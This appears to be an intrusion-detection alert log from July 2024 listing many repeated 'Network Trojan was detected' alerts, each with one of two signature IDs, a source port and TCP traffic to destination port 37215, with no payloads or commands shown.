                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419620
                  SID:2829579
                  Source Port:41322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805292
                  SID:2835222
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.625504
                  SID:2829579
                  Source Port:40500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446454
                  SID:2835222
                  Source Port:48248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.647705
                  SID:2835222
                  Source Port:48724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.135511
                  SID:2835222
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026941
                  SID:2829579
                  Source Port:41786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2829579
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.848465
                  SID:2835222
                  Source Port:59662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.875785
                  SID:2835222
                  Source Port:53452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2835222
                  Source Port:48950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701183
                  SID:2829579
                  Source Port:51186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.058899
                  SID:2835222
                  Source Port:43728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028989
                  SID:2835222
                  Source Port:54406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979594
                  SID:2835222
                  Source Port:54638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.872230
                  SID:2829579
                  Source Port:57940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.610016
                  SID:2829579
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2835222
                  Source Port:50764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.535955
                  SID:2829579
                  Source Port:57982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467970
                  SID:2829579
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2829579
                  Source Port:60756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.167098
                  SID:2829579
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.800548
                  SID:2835222
                  Source Port:54630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2829579
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2835222
                  Source Port:49998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138927
                  SID:2835222
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:40426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2829579
                  Source Port:37034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2829579
                  Source Port:39482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088022
                  SID:2835222
                  Source Port:57688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.436580
                  SID:2829579
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.812870
                  SID:2829579
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.530292
                  SID:2835222
                  Source Port:39264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2835222
                  Source Port:45368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.366648
                  SID:2829579
                  Source Port:36722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381713
                  SID:2835222
                  Source Port:56898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393552
                  SID:2829579
                  Source Port:38870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2835222
                  Source Port:51324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098098
                  SID:2835222
                  Source Port:51656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2829579
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2829579
                  Source Port:37878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2829579
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.891312
                  SID:2835222
                  Source Port:44696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084469
                  SID:2835222
                  Source Port:40050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.266829
                  SID:2829579
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896785
                  SID:2835222
                  Source Port:40848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2835222
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985311
                  SID:2835222
                  Source Port:33548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.372115
                  SID:2829579
                  Source Port:59750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419623
                  SID:2829579
                  Source Port:37258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.120553
                  SID:2829579
                  Source Port:33478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2835222
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.156956
                  SID:2829579
                  Source Port:47300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969941
                  SID:2829579
                  Source Port:57724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065824
                  SID:2835222
                  Source Port:52212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2835222
                  Source Port:53700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2829579
                  Source Port:33552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2829579
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2829579
                  Source Port:37922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2829579
                  Source Port:56638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013030
                  SID:2829579
                  Source Port:35692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.863789
                  SID:2829579
                  Source Port:42676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.182611
                  SID:2829579
                  Source Port:40252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2835222
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2835222
                  Source Port:37834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.570262
                  SID:2835222
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.077819
                  SID:2829579
                  Source Port:48066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2835222
                  Source Port:59418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2829579
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2829579
                  Source Port:52844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2829579
                  Source Port:41502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2829579
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2829579
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149960
                  SID:2829579
                  Source Port:47206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2829579
                  Source Port:45442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2835222
                  Source Port:47874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.336405
                  SID:2835222
                  Source Port:49646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.062552
                  SID:2829579
                  Source Port:34066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.598886
                  SID:2829579
                  Source Port:34408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109463
                  SID:2829579
                  Source Port:53040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609085
                  SID:2835222
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.931064
                  SID:2829579
                  Source Port:33442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2835222
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805292
                  SID:2835222
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2829579
                  Source Port:38140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2829579
                  Source Port:35008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941159
                  SID:2829579
                  Source Port:51302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2835222
                  Source Port:54426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2835222
                  Source Port:45228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2835222
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933243
                  SID:2829579
                  Source Port:46064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2835222
                  Source Port:35924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527475
                  SID:2835222
                  Source Port:35168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.595205
                  SID:2835222
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.599679
                  SID:2829579
                  Source Port:55018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.745015
                  SID:2829579
                  Source Port:56566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.670765
                  SID:2829579
                  Source Port:48118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.411033
                  SID:2835222
                  Source Port:36798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.905931
                  SID:2835222
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.083011
                  SID:2835222
                  Source Port:44686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2835222
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2835222
                  Source Port:60694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2829579
                  Source Port:47612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2829579
                  Source Port:48030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476455
                  SID:2829579
                  Source Port:43150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881994
                  SID:2835222
                  Source Port:52690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.452806
                  SID:2835222
                  Source Port:35702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.485790
                  SID:2835222
                  Source Port:53386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841865
                  SID:2835222
                  Source Port:53768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395055
                  SID:2835222
                  Source Port:46356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.435310
                  SID:2829579
                  Source Port:50112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2835222
                  Source Port:56344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849080
                  SID:2835222
                  Source Port:41764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.805311
                  SID:2829579
                  Source Port:35942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2835222
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.210999
                  SID:2829579
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.385173
                  SID:2829579
                  Source Port:46750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.800404
                  SID:2835222
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2829579
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409716
                  SID:2829579
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.599014
                  SID:2829579
                  Source Port:44106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344652
                  SID:2835222
                  Source Port:55076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584651
                  SID:2835222
                  Source Port:37432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390012
                  SID:2835222
                  Source Port:39152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2829579
                  Source Port:48150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.265037
                  SID:2835222
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.104843
                  SID:2835222
                  Source Port:39274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895681
                  SID:2829579
                  Source Port:52742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2835222
                  Source Port:48850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.880964
                  SID:2835222
                  Source Port:50974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.960841
                  SID:2829579
                  Source Port:42446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2829579
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446107
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667956
                  SID:2829579
                  Source Port:41532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2835222
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2829579
                  Source Port:44974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2835222
                  Source Port:54850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989941
                  SID:2829579
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527013
                  SID:2829579
                  Source Port:60380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.126538
                  SID:2829579
                  Source Port:56252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.861784
                  SID:2835222
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2829579
                  Source Port:45284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2829579
                  Source Port:41036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702208
                  SID:2835222
                  Source Port:34378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2829579
                  Source Port:56536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2835222
                  Source Port:38192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520266
                  SID:2835222
                  Source Port:39960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939250
                  SID:2829579
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2835222
                  Source Port:54046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020493
                  SID:2829579
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.836090
                  SID:2829579
                  Source Port:46600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.415895
                  SID:2829579
                  Source Port:50734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.424605
                  SID:2829579
                  Source Port:39160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2835222
                  Source Port:57748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:41840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.004457
                  SID:2835222
                  Source Port:45232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.673199
                  SID:2829579
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427949
                  SID:2835222
                  Source Port:53820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2829579
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134906
                  SID:2835222
                  Source Port:56008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2835222
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2829579
                  Source Port:34350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.980953
                  SID:2829579
                  Source Port:38912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270060
                  SID:2829579
                  Source Port:46786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2835222
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.893845
                  SID:2835222
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2835222
                  Source Port:57002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.604198
                  SID:2835222
                  Source Port:39468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2829579
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2835222
                  Source Port:51298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2829579
                  Source Port:39114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2829579
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807456
                  SID:2835222
                  Source Port:56952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392725
                  SID:2835222
                  Source Port:52196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.607136
                  SID:2835222
                  Source Port:47528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358335
                  SID:2829579
                  Source Port:47686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2829579
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2829579
                  Source Port:54256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2835222
                  Source Port:46544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2829579
                  Source Port:39430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.617862
                  SID:2835222
                  Source Port:41870
                  Destination Port:37215
